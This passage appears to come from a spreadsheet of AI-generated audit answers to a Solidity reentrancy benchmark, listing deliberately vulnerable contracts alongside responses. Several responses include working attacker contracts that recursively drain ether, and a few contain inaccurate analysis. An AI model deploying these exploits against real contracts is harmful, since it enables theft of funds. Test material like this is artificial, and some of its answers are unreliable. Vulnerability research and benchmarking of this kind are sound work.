    // Function to withdraw Ether from this contract
    function withdraw() public {
        require(msg.sender == owner);
        owner.transfer(address(this).balance);
    }
}
```
In this example, the `attack()` function is called initially to deposit some ether into the vulnerable contract and then trigger `withdrawBalance`. The fallback function will be invoked due to the external call in `withdrawBalance`, causing it to call `withdrawBalance` again, thereby draining more ether than it should.</t>
  </si>
  <si>
    <t>1. Yes
2. Proof of Concept of these vulnerabilities:
The given smart contract code has a reentrancy vulnerability. The issue is in the order of operations in the `withdrawBalance` function. Specifically, the balance is updated (`userBalances[msg.sender] = 0;`) only after the funds are transferred to `msg.sender` (`msg.sender.call.value(amountToWithdraw)()`).
This can be exploited through a reentrancy attack as follows:
- An attacker deploys a contract that has a fallback function, which calls `withdrawBalance` on the vulnerable contract.
- The attacker calls `withdrawBalance` on the vulnerable contract.
- The `msg.sender.call.value(amountToWithdraw)()` line transfers the funds to the attacker’s contract.
- The fallback function in the attacker’s contract is triggered, calling `withdrawBalance` again before `userBalances[msg.sender]` is set to 0.
- This allows the attacker to withdraw more funds than they should be able to.
Here's a simplified example of an attacker's contract:
```solidity
contract Attacker {
    VulnerableContract public vulnerableContract;
    constructor(address _vulnerableContract) {
        vulnerableContract = VulnerableContract(_vulnerableContract);
    }
    // This function initiates the attack
    function attack() external {
        vulnerableContract.withdrawBalance();
    }
    // Fallback function that is called when the contract receives Ether
    fallback() external payable {
        if (address(vulnerableContract).balance &gt;= 0) {
            vulnerableContract.withdrawBalance();
        }
    }
}
```
In this example, the `attack` function is called once, which then triggers the fallback function through the `withdrawBalance` call, effectively allowing the attacker to drain all the funds associated with their address in `userBalances`.</t>
  </si>
  <si>
    <t xml:space="preserve">    function withdrawFunds (uint256 _weiToWithdraw) public {
        require(balances[msg.sender] &gt;= _weiToWithdraw);
        require(_weiToWithdraw &lt;= withdrawalLimit);
        require(now &gt;= lastWithdrawTime[msg.sender] + 1 weeks);
        require(msg.sender.call.value(_weiToWithdraw)());
        balances[msg.sender] -= _weiToWithdraw;
        lastWithdrawTime[msg.sender] = now;
    }</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities? 
   - Yes
2. how this vulnerability can be exploited :
### Vulnerabilities:
#### 1. Reentrancy Attack
- The contract is vulnerable to a reentrancy attack because it updates the user's balance after sending the funds, rather than before. This ordering allows an attacker to re-enter the `withdrawFunds` function before their balance has been updated, enabling them to drain more Ether from the contract than they should be able to.
#### How to Exploit:
1. Deploy an attacker contract that overrides its fallback function to call `withdrawFunds` again.
2. Deposit some Ether into the `EtherStore` contract.
3. Use the attacker contract to call `withdrawFunds`.
4. The attacker contract's fallback function will be triggered, calling `withdrawFunds` again before the balance has been updated.
#### Example Attacker Contract:
```solidity
pragma solidity ^0.4.0;
import "EtherStore.sol";
contract Attack {
    EtherStore public etherStore;
    constructor(address _etherStoreAddress) {
        etherStore = EtherStore(_etherStoreAddress);
    }
    function pwnEtherStore() public payable {
        // Deposit</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities?  
Yes
2. how this vulnerability can be exploited :
### Vulnerabilities:
1. **Reentrancy Attack**: The function is vulnerable to a reentrancy attack because it uses `msg.sender.call.value(_weiToWithdraw)()` before updating the balance and the `lastWithdrawTime`. An attacker can re-enter the `withdrawFunds` function before the balance and the `lastWithdrawTime` are updated.
2. **Gas Limit**: The use of `require(msg.sender.call.value(_weiToWithdraw)());` can potentially throw an exception if the fallback function of the calling contract consumes all the gas. This could lock funds.
#### Reentrancy Attack POC:
Here is a simple contract that can be used to exploit the reentrancy vulnerability.
```solidity
// Attacker contract
contract Attacker {
    address public victim;
    constructor(address _victim) {
        victim = _victim;
    }
    fallback() external payable {
        if (address(victim).balance &gt;= msg.value) {
            Victim(victim).withdrawFunds(msg.value);
        }
    }
    function startAttack(uint256 amount) public {
        Victim(victim).withdrawFunds(amount);
    }
}
// Victim contract (the provided contract)
contract Victim {
    mapping(address =&gt; uint256) public balances;
    mapping(address =&gt; uint256) public lastWithdrawTime;
    uint256 public withdrawalLimit = 1 ether;
    // ... (same as provided code)
    function withdrawFunds (uint256 _weiToWithdraw) public {
        require(balances[msg.sender] &gt;= _weiToWithdraw);
        require(_weiToWithdraw &lt;= withdrawalLimit);
        require(now &gt;= lastWithdrawTime[msg.sender] + 1 weeks);
        require(msg.sender.call.value(_weiToWithdraw)());
        balances[msg.sender] -= _weiToWithdraw;
        lastWithdrawTime[msg.sender] = now;
    }
    // ... (other functions)
}
```
In this example, when `startAttack` is called on the `Attacker` contract, it will trigger the `withdrawFunds` function on the `Victim` contract. The `Victim` contract will then send funds back to the `Attacker` contract, which triggers its fallback function. Inside the fallback function, the `withdrawFunds` function is called again, effectively draining more funds than should be allowed.
#### Recommended Fixes:
1. Use the Checks-Effects-Interactions pattern to mitigate reentrancy attacks. Update the state variables before making external calls.
2. To prevent gas issues, consider using `transfer()` instead of `call.value()`. 
Here's an example of how the function can be updated:
```solidity
function withdrawFunds (uint256 _weiToWithdraw) public {
    require(balances[msg.sender] &gt;= _weiToWithdraw);
    require(_weiToWithdraw &lt;= withdrawalLimit);
    require(now &gt;= lastWithdrawTime[msg.sender] + 1 weeks);
    // Update state variables first (Checks-Effects)
    balances[msg.sender] -= _weiToWithdraw;
    lastWithdrawTime[msg.sender] = now;
    // Interactions last
    (bool success, )</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? 
Answer: Yes
2. how this vulnerability can be exploited :
The contract `EtherStore` has a function `withdrawFunds` that allows a user to withdraw funds from their account. The function first checks whether the user has enough balance to withdraw the specified amount and if the withdrawal limit is met. It then updates the `lastWithdrawTime` before finally transferring the funds.
The reentrancy vulnerability arises because the contract updates `lastWithdrawTime` and then performs the `msg.sender.call.value(_weiToWithdraw)()` line to send the ether to the caller. An attacker can create a malicious contract that overrides its fallback function to call `withdrawFunds` again before the first withdrawal has completed. This would allow the attacker to drain more funds than they should be able to, based on the withdrawal limit and their balance.
Here's a simplified version of how an attacker contract could look like:
```solidity
contract Attack {
    EtherStore public etherStore;
    // Initialize the etherStore variable with the contract address
    constructor(address _etherStoreAddress) {
        etherStore = EtherStore(_etherStoreAddress);
    }
    // Fallback function which is called when the contract receives ether
    function () payable external {
        if (address(etherStore).balance &gt;= msg.value) {
            etherStore.withdrawFunds(msg.value);
        }
    }
    // Function to initiate the attack
    function attack() external payable {
        require(msg.value &gt;= 1 ether);
        etherStore.depositFunds.value(1 ether)();
        etherStore.withdrawFunds(1 ether);
    }
}
```
In the above example, the `attack` function would deposit 1 ether into the `EtherStore` contract and then call</t>
  </si>
  <si>
    <t>1. Yes
2. how this vulnerability can be exploited :
The function `withdrawFunds` contains a reentrancy vulnerability. The issue lies in the ordering of the function's operations. Specifically, the balance of `msg.sender` is updated after the external call `msg.sender.call.value(_weiToWithdraw)()`, allowing for potential reentry attacks.
In a reentrancy attack, the attacker's fallback function could call `withdrawFunds` again before the first call has completed, effectively draining more funds than they should be able to.
Here's a simplified example of an attack contract that could exploit this vulnerability:
```solidity
pragma solidity ^0.8.0;
contract Attack {
    // Reference to the vulnerable contract
    VulnerableContract public vulnerableContract;
    constructor(address _vulnerableContract) {
        vulnerableContract = VulnerableContract(_vulnerableContract);
    }
    // Fallback function that gets called when receiving Ether
    fallback() external payable {
        if (address(vulnerableContract).balance &gt;= msg.sender.balance) {
            vulnerableContract.withdrawFunds(msg.sender.balance);
        }
    }
    // Initial function to kickstart the attack
    function startAttack() public payable {
        require(msg.value &gt; 0, "Send some ether to perform the attack");
        // Assume that the attacker already has a balance in the vulnerable contract
        vulnerableContract.withdrawFunds(msg.value);
    }
}
```
In this attack contract, the fallback function checks if the vulnerable contract still has funds. If it does, the fallback function makes another call to `withdrawFunds`, initiating another round of withdrawal. This cycle can continue until the funds in the vulnerable contract are drained.
To fix the vulnerability, the balance should be updated before making the external call:
```solidity
function withdrawFunds (uint256 _weiToWithdraw) public {
    require(balances[msg.sender] &gt;= _weiToWithdraw);
    require(_weiToWithdraw &lt;= withdrawalLimit);
    require(now &gt;= lastWithdrawTime[msg.sender] + 1 weeks);
    balances[msg.sender] -= _weiToWithdraw;
    lastWithdrawTime[msg.sender] = now;
    require(msg.sender.call.value(_weiToWithdraw)());
}
```
By moving the state changes before the external call, the function eliminates the reentrancy vulnerability.</t>
  </si>
  <si>
    <t>dataset/reentrancy/etherstore.sol</t>
  </si>
  <si>
    <t>dataset/reentrancy/modifier_reentrancy.sol</t>
  </si>
  <si>
    <t>contract ModifierEntrancy {
  mapping (address =&gt; uint) public tokenBalance;
  string constant name = "Nu Token";
  function airDrop() hasNoBalance supportsToken  public{
    tokenBalance[msg.sender] += 20;
  }
  modifier supportsToken() {
    require(keccak256(abi.encodePacked("Nu Token")) == Bank(msg.sender).supportsToken());
    _;
  }
  modifier hasNoBalance {
      require(tokenBalance[msg.sender] == 0);
      _;
  }
}</t>
  </si>
  <si>
    <t>### Analysis
1. Are there any vulnerabilities?  
Yes
2. how this vulnerability can be exploited :
#### Reentrancy Attack:
The contract `ModifierEntrancy` is vulnerable to a reentrancy attack. The issue is in the `supportsToken` modifier where it calls `Bank(msg.sender).supportsToken()`. An attacker can create a malicious contract, like the `attack` contract in the code, that overrides the `supportsToken` function and recursively calls the `airDrop` function.
Here's how the attack can be executed:
- The attacker deploys the `attack` contract.
- The attacker then calls `call(address token)` on the `attack` contract, passing the address of the deployed `ModifierEntrancy` contract.
- The `call` function calls `ModifierEntrancy.airDrop()`.
- `ModifierEntrancy.airDrop()` in turn calls `supportsToken` modifier.
- The `supportsToken` modifier calls `supportsToken()` on `msg.sender` which is now the `attack` contract.
- The `attack.supportsToken()` function sets `hasBeenCalled` to `true` and recursively calls `ModifierEntrancy.airDrop()`.
- This will bypass the `hasNoBalance` check and allow the attacker to gain more tokens than intended.
The above scenario violates the intended logic and allows an attacker to drain the tokens from the vulnerable contract.</t>
  </si>
  <si>
    <t>1. Yes, there is a vulnerability.
2. Proof of Concept of this Vulnerability:
The vulnerability lies in the `airDrop()` function where it is adding 20 tokens to the `msg.sender`'s balance without any condition or validation. As long as the function is called by any address, the balance of that address will increase by 20 tokens. This can be exploited by an attacker who could call this function repeatedly to add an arbitrary amount of tokens to their balance.
3. The Business Impact of this Vulnerability:
The `airDrop()` function leads to an unlimited token minting vulnerability, allowing any user to arbitrarily increase their token balance.
4. Potential Solutions of this Vulnerability:
- Implement a check to validate if the airdrop function has already been called by the address. This can be done by maintaining a mapping of addresses that have already called the function and checking this mapping before adding tokens to the balance.
- Implement rate limiting to prevent the same address from calling the function repeatedly within a certain timeframe.
- Add an access control modifier to the `airDrop()` function so that only a specific address (like the contract owner) can call it. This will ensure that only the contract owner can distribute tokens.
- Set a limit to the total number of tokens that can be minted or distributed by the contract. This will ensure that the total supply of the token is capped and cannot be arbitrarily increased.</t>
  </si>
  <si>
    <t>1. Yes
2. how this vulnerability can be exploited :
The contract `ModifierEntrancy` is vulnerable to a reentrancy attack, particularly in the `airDrop` function. This function uses the `supportsToken` modifier, which calls the `supportsToken` function of another contract (potentially an attacker's contract). This external call allows for reentrant behavior, making the `ModifierEntrancy` contract susceptible to reentrancy attacks.
### Vulnerable Code Points:
1. The `supportsToken` modifier in `ModifierEntrancy` makes an external call to `Bank(msg.sender).supportsToken()`.
2. This external call can be hijacked to call back into the `ModifierEntrancy` contract before the original call is finished.
### Attack Scenario:
1. An attacker deploys a malicious contract that implements the `supportsToken` function (e.g., the `attack` contract in the code).
2. The attacker calls the `call(address token)` function from the `attack` contract, passing the address of the `ModifierEntrancy` contract.
3. This triggers the `airDrop` function in `ModifierEntrancy`, which then calls the `supportsToken` function in the `attack` contract due to the `supportsToken` modifier.
4. Inside `supportsToken` of the `attack` contract, the attacker then re-calls `airDrop` in `ModifierEntrancy` before the original call is completed.
5. As a result, the attacker can bypass the `hasNoBalance` condition multiple times and inflate their token balance.
This attack can be carried out using the `attack` contract provided in the code, which demonstrates how the reentrancy could be executed.</t>
  </si>
  <si>
    <t>1. Yes
2. how this vulnerability can be exploited :
The `ModifierEntrancy` contract is vulnerable to a reentrancy attack through its `airDrop` function. The function uses two modifiers, `supportsToken` and `hasNoBalance`, to check certain conditions before executing the main functionality of the function. The `supportsToken` modifier calls an external contract, `Bank(msg.sender).supportsToken()`, which could lead to reentrancy if the `Bank` contract has malicious code in its `supportsToken` method.
Here's a possible attack scenario:
1. An attacker deploys a malicious contract that inherits from a `Bank` interface.
2. The malicious contract overrides the `supportsToken` function to call back into the `ModifierEntrancy` contract's `airDrop` function.
3. When `airDrop` is called the first time, the `hasNoBalance` condition is satisfied.
4. When `supportsToken` is executed, it calls back into the malicious `Bank` contract.
5. The malicious `Bank` contract's `supportsToken` function calls `airDrop` again.
6. Because the state (`tokenBalance[msg.sender]`) hasn't been updated yet, the `hasNoBalance` condition is satisfied again.
7. The attacker ends up receiving 40 tokens instead of 20.
Here's a simplified example of a malicious contract:
```solidity
interface Bank {
    function supportsToken() external view returns (bytes32);
}
contract MaliciousBank is Bank {
    ModifierEntrancy target;
    constructor(ModifierEntrancy _target) {
        target = _target;
    }
    function attack() public {
        target.airDrop();
    }
    function supportsToken() external view override returns (bytes32) {
        target.airDrop();
        return keccak256(abi.encodePacked("Nu Token"));
    }
}
```
In this example, the attacker would deploy the `MaliciousBank` contract, passing in the address of the `ModifierEntrancy` contract, and then call the `attack` function. This would result in the attacker receiving 40 tokens instead of the intended 20.</t>
  </si>
  <si>
    <t>dataset/reentrancy/reentrance.sol</t>
  </si>
  <si>
    <t xml:space="preserve">  function withdraw(uint _amount) public {
    if(balances[msg.sender] &gt;= _amount) {
      if(msg.sender.call.value(_amount)()) {
        _amount;
      }
      balances[msg.sender] -= _amount;
    }
  }</t>
  </si>
  <si>
    <t>1. Yes
2. how this vulnerability can be exploited :
The contract `Reentrance` contains a reentrancy vulnerability in the `withdraw` function. The function updates the state variable `balances[msg.sender]` only after it has sent Ether to `msg.sender` using the `call.value(_amount)()` function. This opens up an opportunity for a malicious contract to repeatedly call the `withdraw` function before the state is updated, essentially draining the contract of its Ether.
Here's how the attack could work:
1. The attacker deploys a contract that has a fallback function designed to call the `withdraw` function of the vulnerable contract.
2. The attacker sends some Ether to the vulnerable contract via the `donate` function.
3. The attacker then calls the `withdraw` function from their malicious contract.
4. The `withdraw` function of the vulnerable contract sends Ether to the malicious contract and triggers its fallback function.
5. The fallback function again calls `withdraw`, and the cycle continues until the vulnerable contract is drained of its Ether.
Here is a sample malicious contract that exploits this vulnerability:
```solidity
pragma solidity ^0.4.18;
import "Reentrance.sol";
contract Attack {
    Reentrance public reentrance;
    address public owner;
    constructor(address _reentrance) {
        reentrance = Reentrance(_reentrance);
        owner = msg.sender;
    }
    function() public payable {
        if (address(reentrance).balance &gt; 1 ether) {
            reentrance.withdraw(1 ether);
        }
    }
    function attack() public {
        reentrance.donate.value(1 ether)(address(this));
        reentrance.withdraw(1 ether);
    }
    function collect() public {
        require(msg.sender == owner);
        msg.sender.transfer(address(this).balance);
    }
}
```
In this example, the `attack` function initializes the attack by sending 1 Ether to the vulnerable contract and then calls its `withdraw` function. The fallback function (`function() public payable`) will then keep calling `withdraw` as long as the vulnerable contract has more than 1 Ether. Finally, the `collect` function allows the attacker to withdraw the stolen Ether.
This reentrancy attack can be mitigated by updating the state (`balances[msg.sender] -= _amount;`) before making the external call (`msg.sender.call.value(_amount)()`).</t>
  </si>
  <si>
    <t>1. Yes, there is a vulnerability in this code.
2. Proof of concept of this vulnerability:
The vulnerability in this code is a well-known issue referred to as a re-entrancy attack. The re-entrancy vulnerability is due to the fact that the state of the contract is updated after the `call` function. This allows for the function to be recursively invoked before the state (in this case, the balance of the sender) is updated.
An attacker can exploit this by creating a malicious contract that calls back into the `withdraw` function in its fallback function, leading to the possibility of withdrawing more funds than their balance.
Here's a simplified example of such a malicious contract:
```Solidity
contract Attack {
    VulnerableContract public victim;
    constructor(VulnerableContract _victim) {
        victim = _victim;
    }
    function attack() external payable {
        victim.deposit.value(msg.value)();
        victim.withdraw(msg.value);
    }
    function () external payable {
        if (address(victim).balance &gt;= msg.value) {
            victim.withdraw(msg.value);
        }
    }
}
```
3. The business impact of this vulnerability in one sentence: 
The `withdraw` function leads to a re-entrancy attack, which could drain all the funds from the contract.
4. The potential solutions of this vulnerability:
The vulnerability can be mitigated by ensuring that the state of the contract is updated before calling external contracts. This is known as the Checks-Effects-Interactions pattern in Solidity.
Revised code would look like this:
```Solidity
function withdraw(uint _amount) public {
    require(balances[msg.sender] &gt;= _amount, "Insufficient balance");
    balances[msg.sender] -= _amount;
    (bool success, ) = msg.sender.call.value(_amount)("");
    require(success, "Transfer failed");
}
```
This code first checks that the sender has enough balance (`require(balances[msg.sender] &gt;= _amount)`), then updates the state of the contract (`balances[msg.sender] -= _amount`), and finally interacts with an external contract (`msg.sender.call.value(_amount)("")`). 
Also, it's a good idea to consider using the `transfer` function instead of `call.value`, as `transfer` only forwards a limited gas stipend, preventing re-entrancy. However, since Ethereum's Istanbul update, this is less of a concern, but still considered good practice.</t>
  </si>
  <si>
    <t>1. Yes
2. how this vulnerability can be exploited :
The contract `Reentrance` contains a reentrancy vulnerability in the `withdraw` function. The function updates the state variable `balances[msg.sender]` only after it has sent Ether to `msg.sender` using the `call.value(_amount)()` function. This opens up an opportunity for a malicious contract to repeatedly call the `withdraw` function before the state is updated, essentially draining the contract of its Ether.
Here's how the attack could work:
1. The attacker deploys a contract that has a fallback function designed to call the `withdraw` function of the vulnerable contract.
2. The attacker sends some Ether to the vulnerable contract via the `donate` function.
3. The attacker then calls the `withdraw` function from their malicious contract.
4. The `withdraw` function of the vulnerable contract sends Ether to the malicious contract and triggers its fallback function.
5. The fallback function again calls `withdraw`, and the cycle continues until the vulnerable contract is drained of its Ether.
Here is a sample malicious contract that exploits this vulnerability:
```solidity
pragma solidity ^0.4.18;
import "Reentrance.sol";
contract Attack {
    Reentrance public reentrance;
    address public owner;
    constructor(address _reentrance) {
        reentrance = Reentrance(_reentrance);
        owner = msg.sender;
    }
    function() public payable {
        if (address(reentrance).balance &gt; 1 ether) {
            reentrance.withdraw(1 ether);
        }
    }
    function attack() public {
        reentrance.donate.value(1 ether)(address(this));
        reentrance.withdraw(1 ether);
    }
    function collect() public {
        require(msg.sender == owner);
        msg.sender.transfer(address(this).balance);
    }
}
```
In this example, the `attack` function initializes the attack by sending 1 Ether to the vulnerable contract and then calls its `withdraw` function. The fallback function (`function() public payable`) will then keep calling `withdraw` as long as the vulnerable contract has more than 1 Ether. Finally, the `collect` function allows the attacker to withdraw the stolen Ether.
This reentrancy attack can be mitigated by updating the state (`balances[msg.sender] -= _amount;`) before making the external call (`msg.sender.call.value(_amount)()`).</t>
  </si>
  <si>
    <t>1. Yes
2. how this vulnerability can be exploited :
The function `withdraw` in the given code snippet is vulnerable to a reentrancy attack. The function first checks if the user has a sufficient balance, then sends the funds, and finally updates the balance. The vulnerability arises because the contract's state (`balances[msg.sender]`) is updated after the funds are sent (`msg.sender.call.value(_amount)()`).
Here's a simple proof of concept using a malicious contract:
```solidity
pragma solidity ^0.8.0;
contract VulnerableContract {
    mapping(address =&gt; uint) public balances;
    function deposit() public payable {
        balances[msg.sender] += msg.value;
    }
    function withdraw(uint _amount) public {
        if(balances[msg.sender] &gt;= _amount) {
            if(msg.sender.call{value: _amount}("")) {
                _amount;  // This line is actually a no-op and doesn't do anything
            }
            balances[msg.sender] -= _amount;
        }
    }
}
contract Attacker {
    VulnerableContract public vulnerableContract;
    address public owner;
    constructor(address _vulnerableContract) {
        vulnerableContract = VulnerableContract(_vulnerableContract);
        owner = msg.sender;
    }
    function depositFunds() public payable {
        require(msg.sender == owner, "Only owner can deposit");
        vulnerableContract.deposit{value: msg.value}();
    }
    function startAttack(uint _amount) public {
        require(msg.sender == owner, "Only owner can start the attack");
        vulnerableContract.withdraw(_amount);
    }
    fallback() external payable {
        if(address(vulnerableContract).balance &gt;= msg.value) {
            vulnerableContract.withdraw(msg.value);
        }
    }
    function collectFunds() public {
        require(msg.sender == owner, "Only owner can collect funds");
        payable(owner).transfer(address(this).balance);
    }
}
```
In the above code, the `Attacker` contract first deposits some amount into the `VulnerableContract`. Then, it calls the `withdraw` function of `VulnerableContract`. When the `msg.sender.call.value(_amount)()` line is executed in `VulnerableContract`, it triggers the fallback function in the `Attacker` contract. The fallback function calls `withdraw` again before the state has been updated in `VulnerableContract`, allowing it to drain more funds than it should be able to.</t>
  </si>
  <si>
    <t>dataset/reentrancy/reentrancy_bonus.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function getFirstWithdrawalBonus(address recipient) public {
        require(!claimedBonus[recipient]); // Each recipient should only be able to claim the bonus once
        rewardsForA[recipient] += 100;
        withdrawReward(recipient); // At this point, the caller will be able to execute getFirstWithdrawalBonus again.
        claimedBonus[recipient] = true;
    }</t>
  </si>
  <si>
    <t>Based on the first 500 characters of the code, I can't make a definitive judgment about vulnerabilities. Would you like me to display the entire code for you so that we can analyze it together?</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities?  
Yes
2. how this vulnerability can be exploited :
The function `getFirstWithdrawalBonus` contains a reentrancy vulnerability. Reentrancy is a vulnerability where a function can be entered multiple times before it is completed. In this case, the function `withdrawReward(recipient);` could potentially call back into `getFirstWithdrawalBonus` before `claimedBonus[recipient] = true;` has been executed.
Here's how the attack could occur:
- The attacker calls `getFirstWithdrawalBonus` with their address.
- The `withdrawReward` function is called within `getFirstWithdrawalBonus`.
- Inside `withdrawReward`, it's likely that Ether is sent to the `recipient` address, which could be a contract.
- That contract, in its fallback function, could call `getFirstWithdrawalBonus` again before `claimedBonus[recipient] = true;` has been set.
- This would allow the attacker to claim the bonus multiple times in a single transaction.
To fix this, it's generally recommended to change states before calling external contracts. In this case, setting `claimedBonus[recipient] = true;` before calling `withdrawReward(recipient);` would mitigate the reentrancy vulnerability.</t>
  </si>
  <si>
    <t>1. Are there any reentrancy vulnerabilities? 
Yes.
2. how this vulnerability can be exploited :
The contract `Reentrancy_bonus` contains a reentrancy vulnerability in the `getFirstWithdrawalBonus` function. Specifically, this function first updates `rewardsForA[recipient]` by adding 100 to it and then calls `withdrawReward(recipient)` to actually transfer the amount. Inside `withdrawReward`, there is a call to the `recipient`'s fallback function via `recipient.call.value(amountToWithdraw)("")`. This allows for the `recipient` to re-enter the contract before `claimedBonus[recipient]` has been set to `true`, thereby allowing the recipient to claim the bonus multiple times.
Here is a step-by-step scenario:
1. User calls `getFirstWithdrawalBonus()`. Their corresponding `rewardsForA` is incremented by 100.
2. `withdrawReward()` is called within `getFirstWithdrawalBonus()`.
3. `recipient.call.value(amountToWithdraw)("")` is called within `withdrawReward()`, triggering the fallback function of the `recipient` contract.
4. The fallback function of the `recipient` contract can call `getFirstWithdrawalBonus()` again before `claimedBonus[recipient]` is set to `true`.
5. This allows for an infinite loop, where the `recipient` can claim the 100 reward bonus multiple times.
An attacker could create a malicious contract that exploits this reentrancy vulnerability to drain the `rewardsForA` mapping for their address.</t>
  </si>
  <si>
    <t>1. Yes
2. Proof of Concept of these vulnerabilities:
The code is susceptible to a reentrancy attack. The function `getFirstWithdrawalBonus` updates the state variable `claimedBonus[recipient]` only after calling another function `withdrawReward(recipient)`. If the `withdrawReward` function is not carefully implemented, it could enable the recipient to re-enter `getFirstWithdrawalBonus` before `claimedBonus[recipient]` is set to `true`.
Here's a potential exploit:
1. Assume `withdrawReward` sends Ether to `recipient`.
2. A malicious contract can be created to call `getFirstWithdrawalBonus` again when its fallback function is invoked by `withdrawReward`.
3. During the second invocation of `getFirstWithdrawalBonus`, `claimedBonus[recipient]` is still `false`.
4. This allows the malicious contract to claim the bonus repeatedly.
Example malicious contract:
```solidity
contract MaliciousContract {
    VulnerableContract public vulnerableContract;
    constructor(address _vulnerableContractAddress) {
        vulnerableContract = VulnerableContract(_vulnerableContractAddress);
    }
    function attack() public {
        vulnerableContract.getFirstWithdrawalBonus(address(this));
    }
    // Fallback function
    receive() external payable {
        if (address(vulnerableContract).balance &gt; 1 ether) {
            vulnerableContract.getFirstWithdrawalBonus(address(this));
        }
    }
}
```
In this example, when `MaliciousContract`'s fallback function is triggered by `withdrawReward`, it calls `getFirstWithdrawalBonus` again, and since `claimedBonus[recipient]` is still `false`, it can claim the bonus multiple times.</t>
  </si>
  <si>
    <t>dataset/reentrancy/reentrancy_cross_function.sol</t>
  </si>
  <si>
    <t>function withdrawBalance() public {
        uint amountToWithdraw = userBalances[msg.sender];
        (bool success, ) = msg.sender.call.value(amountToWithdraw)(""); // At this point, the caller's code is executed, and can call transfer()
        require(success);
        userBalances[msg.sender] = 0;
    }</t>
  </si>
  <si>
    <t>Alright, I'll start by reviewing the content of the provided file "reentrancy_cross_function.sol".
The provided Solidity code defines a contract named `Reentrancy_cross_function`. Here's a brief overview of its structure and functionality:
1. The contract uses the Solidity version `0.4.0`.
2. It has a private mapping `userBalances` that associates Ethereum addresses with their balances.
3. The contract has two functions:
   - `transfer(address to, uint amount)`: Transfers the specified `amount` from the sender's balance to the address `to`.
   - `withdrawBalance()`: Allows a user to withdraw their entire balance. The function sends the amount to the caller's address using a low-level `.call.value()` function.
**Analysis:**
1. Are there any vulnerabilities?
**Answer:** Yes.
2. how this vulnerability can be exploited :
The contract is vulnerable to a reentrancy attack due to the use of the `.call.value()` function in the `withdrawBalance()` function. This low-level call allows the recipient to execute arbitrary code before the function completes its execution. An attacker can exploit this vulnerability by creating a malicious fallback function in their contract that calls the `transfer()` function of the `Reentrancy_cross_function` contract. This can lead to a situation where the attacker drains more funds than they should be able to.
**Proof of Concept**:
1. An attacker creates a contract with a fallback function that calls the `transfer()` function of the `Reentrancy_cross_function` contract.
2. The attacker deposits some ether into the `Reentrancy_cross_function` contract to have a balance.
3. The attacker then calls the `withdrawBalance()` function.
4. When the `.call.value()` is executed, it triggers the attacker's fallback function, which in turn calls the `transfer()` function of the `Reentrancy_cross_function` contract.
5. This allows the attacker to withdraw more funds than their balance, effectively draining the contract.
This vulnerability arises due to the order of operations in the `withdrawBalance()` function. The user's balance should be set to zero before the funds are sent to prevent reentrancy attacks.</t>
  </si>
  <si>
    <t>1. Are there any vulnerabilities?
Answer: Yes.
2. how this vulnerability can be exploited :
This code contains a reentrancy vulnerability. The reentrancy attack, often referred to as a recursive call attack, occurs when the called contract (in this case, the caller's contract) calls back into the calling contract before the first invocation is completed. In the `withdrawBalance` function, the state variable `userBalances[msg.sender]` is not set to 0 before the funds are sent. This means that if the fallback function of the caller's contract calls `withdrawBalance` again, it can potentially withdraw more funds than it should.
Here is a step-by-step breakdown of how the attack could work:
1. The attacker deploys a malicious contract with a fallback function that calls `withdrawBalance` when it receives Ether.
2. The attacker deposits some amount of Ether into the vulnerable contract to set a non-zero balance for their address.
3. The attacker calls `withdrawBalance` from the malicious contract.
4. When the `(bool success, ) = msg.sender.call.value(amountToWithdraw)("");` line is executed, the malicious contract's fallback function is triggered.
5. The fallback function of the malicious contract calls `withdrawBalance` again.
6. Since `userBalances[msg.sender]` is not yet set to 0 from the first call, the attacker can withdraw their balance again.
7. This can be repeated recursively, allowing the attacker to drain all the funds from the vulnerable contract.
To prevent this, the state change (`userBalances[msg.sender] = 0;`) should be made before the external call (`msg.sender.call.value(amountToWithdraw)("")`). This ensures that even if the external call triggers a reentrancy attack, the balance for the attacker is already set to 0, and they cannot withdraw more funds.</t>
  </si>
  <si>
    <t>Let's start by examining the content of the uploaded Solidity code file to identify any potential reentrancy vulnerabilities.
The contract "Reentrancy_cross_function" has the following functions:
1. `transfer(address to, uint amount)`: Transfers a specified amount from the sender's balance to the given address if the sender has sufficient balance.
2. `withdrawBalance()`: Allows users to withdraw their entire balance.
### Reentrancy Vulnerability Analysis:
1. **Are there any reentrancy vulnerabilities?**
   Yes.
2. **how this vulnerability can be exploited :**
   - In the `withdrawBalance()` function, the contract sends funds to `msg.sender` using the `.call.value()` method. Right after the funds are sent, but before the user's balance is set to 0, the external code of `msg.sender` (if it's a contract) can be executed.
   - During this external code execution, `msg.sender` can call the `transfer()` function to transfer out additional funds.
   - By the time the execution returns to the `withdrawBalance()` function to set the balance to 0, the user could have withdrawn more than their initial balance.
This is a classic reentrancy attack where the state of the contract (in this case, the user's balance) is not updated before sending funds, allowing recursive calls to exploit the contract.</t>
  </si>
  <si>
    <t>"1. Are there any reentrancy vulnerabilities? 
Answer: Yes.
2. how this vulnerability can be exploited :
The function `withdrawBalance` is vulnerable to a reentrancy attack because the contract sends ether (`msg.sender.call.value(amountToWithdraw)("""")`) before updating the internal state (`userBalances[msg.sender] = 0;`). 
An attacker can exploit this by creating a malicious contract that overrides the fallback function. When the `withdrawBalance` function sends ether to the attacker's contract, the fallback function is invoked. Inside this fallback function, the attacker can recursively call `withdrawBalance` again before the original `withdrawBalance` call has had a chance to set the `userBalances[msg.sender]` to 0. This allows the attacker to drain more ether than they are supposed to.
Here's a simple malicious contract that could exploit this vulnerability:
```solidity
contract Attack {
    VulnerableContract target;
    constructor(address _target) public {
        target = VulnerableContract(_target);
    }
    // This function triggers the attack
    function startAttack() public payable {
        target.deposit.value(msg.value)(); // Assuming there's a deposit function to add funds
        target.withdrawBalance();
    }
    // Fallback function that gets called when the contract receives ether
    receive() external payable {
        if (address(target).balance &gt; 0) {
            target.withdrawBalance();
        }
    }
}
```
When `startAttack` is called, it first deposits some amount into the vulnerable contract. Then it triggers the `withdrawBalance` method. Once the ether is sent to the `Attack` contract, the `receive` function is triggered and calls `withdrawBalance` again, recursively, until all ether in the `VulnerableContract` is drained."</t>
  </si>
  <si>
    <t>dataset/reentrancy/reentrancy_dao.sol</t>
  </si>
  <si>
    <t xml:space="preserve">    function withdrawAll() public {
        uint oCredit = credit[msg.sender];
        if (oCredit &gt; 0) {
            balance -= oCredit;
